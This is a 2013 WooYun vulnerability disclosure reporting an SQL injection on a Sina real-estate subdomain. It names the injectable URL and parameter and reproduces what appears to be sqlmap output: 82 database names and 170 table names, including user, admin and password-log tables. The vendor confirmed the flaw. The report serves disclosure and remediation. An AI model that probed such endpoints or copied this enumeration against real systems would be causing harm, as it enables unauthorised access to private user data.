当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-038252

漏洞标题:新浪某分站SQL注入漏洞一枚

相关厂商:新浪

漏洞作者: m1x7e1

提交时间:2013-09-26 14:17

修复时间:2013-11-10 14:17

公开时间:2013-11-10 14:17

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-26: 细节已通知厂商并且等待厂商处理中
2013-09-26: 厂商已经确认,细节仅向厂商公开
2013-10-06: 细节向核心白帽子及相关领域专家公开
2013-10-16: 细节向普通白帽子公开
2013-10-26: 细节向实习白帽子公开
2013-11-10: 细节向公众公开

简要描述:

新浪某分站SQL注入漏洞,好多库啊。

详细说明:

地址:http://sz.esf.sina.com.cn/ad?p=100

001.png


available databases [82]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] shop_admin
[*] shop_bj
[*] shop_bozhou
[*] shop_cangzhou
[*] shop_cc
[*] shop_cd
[*] shop_chaohu
[*] shop_chuzhou
[*] shop_cq
[*] shop_cs
[*] shop_cz
[*] shop_datong
[*] shop_dg
[*] shop_dl
[*] shop_fs
[*] shop_fushun
[*] shop_fz
[*] shop_gg
[*] shop_gl
[*] shop_gy
[*] shop_gz
[*] shop_haikou
[*] shop_heb
[*] shop_hf
[*] shop_hhht
[*] shop_hk
[*] shop_huangshan
[*] shop_huizhou
[*] shop_hz
[*] shop_jiangmen
[*] shop_jinzhong
[*] shop_jn
[*] shop_klmy
[*] shop_km
[*] shop_ks
[*] shop_lanzhou
[*] shop_liuzhou
[*] shop_luoyang
[*] shop_lw
[*] shop_nb
[*] shop_nc
[*] shop_nj
[*] shop_nn
[*] shop_nt
[*] shop_pzh
[*] shop_qd
[*] shop_qhd
[*] shop_quanzhou
[*] shop_sanya
[*] shop_sh
[*] shop_sjz
[*] shop_suzh
[*] shop_suzhou
[*] shop_sy
[*] shop_sz
[*] shop_tangshan
[*] shop_tj
[*] shop_tongling
[*] shop_ty
[*] shop_weifang
[*] shop_weihai
[*] shop_wh
[*] shop_wuhu
[*] shop_wx
[*] shop_xian
[*] shop_xm
[*] shop_xz
[*] shop_yangjiang
[*] shop_yangzhou
[*] shop_yichang
[*] shop_yt
[*] shop_yuncheng
[*] shop_zb
[*] shop_zhengzhou
[*] shop_zhongshan
[*] shop_zhuhai
[*] shop_zjk
[*] shop_zz
[*] test


Database: shop_admin
[170 tables]
+-------------------------------+
| ad_list |
| ad_name |
| ad_time |
| apply_register |
| article_tag |
| assign_log |
| auth_package |
| bargain_cache |
| bargain_info |
| bargain_info_log |
| bargain_online |
| bargain_online_list |
| bargain_package_list |
| bargain_receipt |
| buy_intention |
| check_log |
| check_log_bak |
| community_bargain_list |
| community_distanceset |
| community_distanceset_list |
| community_repair |
| community_source_ad |
| community_stype |
| community_stype_set |
| community_stype_set_list |
| community_tmp |
| community_weibo |
| community_weibo_bj |
| community_weibo_sh |
| community_weibo_tj |
| company_project_relation |
| confirm_appointment_log |
| count_house_avgprice |
| credit_log |
| dict_districtblock |
| dict_districtblock_merge_logs |
| es_community_baidu |
| es_home_compare |
| es_home_gujia |
| es_home_spider |
| es_pinzhuan_delete |
| es_pinzhuan_keyword |
| es_pinzhuan_status |
| feat_bargain_account |
| feat_baseinfo |
| feat_bonus |
| feat_kpiinfo |
| feat_ratio_config |
| feat_sysuser |
| fy_agentphone |
| gujia_nohouse |
| gujia_report |
| gujia_report_result |
| gujia_user |
| hd_reserve_sms_log |
| help |
| help_article |
| help_content |
| help_left |
| help_suggest |
| help_tag |
| helpsort |
| home_agent_relation |
| house_active_statistics |
| htlp |
| job_distribute |
| job_log |
| leju_house |
| lost_mobile |
| mobile_pocketagent_bound |
| mobile_sendmessage_log |
| my_maintain |
| navigation |
| new_building |
| new_company_project |
| new_mail_log |
| new_mobilecode |
| new_order_record |
| new_order_step |
| new_plan |
| new_plan_bak |
| new_plan_relation |
| new_project_list |
| new_user_contact |
| plan_white_list |
| property_developer |
| rec_house |
| rec_house_collection |
| rec_project |
| renchou |
| reply |
| sale_done |
| sale_package |
| shop_fitmentinfo |
| sp_agent_apply_log |
| sp_agentphone |
| sp_app_list |
| sp_app_model |
| sp_app_model_list |
| sp_app_type |
| sp_city |
| sp_dict |
| sp_house_import |
| sp_keep_ex_phone |
| sp_lime |
| sp_log |
| sp_login_log |
| sp_luck_list |
| sp_mobile_send |
| sp_notice |
| sp_pay_log |
| sp_permission |
| sp_phone_log |
| sp_project_view |
| sp_pwd_log |
| sp_role |
| sp_role_permission |
| sp_service_phone |
| sp_sys_user |
| sp_sys_userpermission |
| sp_user |
| sp_user_attention |
| sp_user_bj |
| sp_user_comment |
| sp_user_community |
| sp_user_community_active |
| sp_user_community_ext |
| sp_user_community_operate_log |
| sp_user_data |
| sp_user_del_log |
| sp_user_del_pic |
| sp_user_ext |
| sp_user_link |
| sp_user_loginlog |
| sp_user_luck |
| sp_user_person |
| sp_user_pic |
| sp_user_pic_data |
| sp_user_pic_data_tmp |
| sp_user_recover |
| sp_user_setting |
| sp_user_subscription |
| sp_weixin_log |
| sp_weixin_user |
| sp_yxgw |
| study_admin |
| study_reply |
| study_sys |
| study_topic |
| sys_log |
| sys_variable |
| text_filter |
| tmp_tg_baidu |
| tmp_user |
| topic |
| user_book |
| user_book_info |
| user_relation |
| valuation_house_log |
| valuation_house_report |
| valuation_no_data |
| ws_admin_role |
| ws_agent_admin_users |
| ws_fy_cell |
| ws_fy_housetype |
| ws_fy_project |
| ws_partner |
| ws_pic_housetype |
| ws_project_list |
| ws_sp_user |
+-------------------------------+

漏洞证明:

见详细说明

修复方案:

管理员会修复的。

版权声明:转载请注明来源 m1x7e1@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-09-26 14:23

厂商回复:

感谢关注新浪安全,已安排人员进行修复~

最新状态:

暂无


漏洞评价:

评论